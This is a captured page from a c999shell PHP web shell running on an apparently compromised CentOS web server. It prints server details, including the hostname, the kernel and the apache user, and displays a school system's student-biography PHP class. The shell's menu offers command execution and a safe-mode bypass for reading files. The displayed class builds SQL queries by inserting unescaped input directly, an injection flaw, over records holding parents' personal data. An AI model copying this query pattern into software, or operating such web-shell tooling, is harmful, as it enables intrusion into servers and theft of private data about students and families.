Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/class/ drwxr-xr-x |
Viewing file: clsStudentBio.php (2.02 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | status==1) { $sql = "insert into StudentBio(studentId, studentSex, parentName, parentRelation, parentAddress, parentDistrictId, parentAmphurId, parentProvinceId, parentZipcode, parentPhoneNo, parentMobile, parentOcc, parentIncome, parentEmail, canRefund, healthPrivId) values('$this->studentId', '$this->studentSex', '$this->parentName', '$this->parentRelation', '$this->parentAddress', $this->parentDistrictId, $this->parentAmphurId, $this->parentProvinceId, '$this->parentZipcode', '$this->parentPhoneNo', $this->parentMobile, '$this->parentOcc', '$this->parentIncome', '$this->parentEmail', '$this->canRefund', $this->healthPrivId)"; }else { $sql = "update StudentBio set studentSex='$this->studentSex', parentName='$this->parentName', parentRelation='$this->parentRelation', parentAddress='$this->parentAddress', parentDistrictId=$this->parentDistrictId, parentAmphurId=$this->parentAmphurId, parentProvinceId=$this->parentProvinceId, parentZipcode='$this->parentZipcode', parentPhoneNo='$this->parentPhoneNo', parentMobile=$this->parentMobile, parentOcc='$this->parentOcc', parentIncome='$this->parentIncome', parentEmail='$this->parentEmail', canRefund='$this->canRefund', healthPrivId=$this->healthPrivId where studentId='$this->studentId'"; } $this->SetQuery($sql); } // Use on page addResultExamOcc.php function RSStudentBioByStudIdAndNonAdd($xKey){ $this->SetQuery("select * from StudentBio where studentId='$xKey' "); // $this->SetQuery("select * from StudentBio where studentId='$xKey' and occExamResult='' "); } //-- The End -- function RSStudentBioByDate($date){ $this->SetQuery("select * from StudentBio where birthDate = '$date' "); } function RSStudentBioByDayAndMonth($day,$month){ $this->SetQuery("select * from StudentBio where DAYOFMONTH(birthDate) = '$day' AND MONTH(birthDate) = '$month'"); } } //--End class StudentBio-- ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]-- |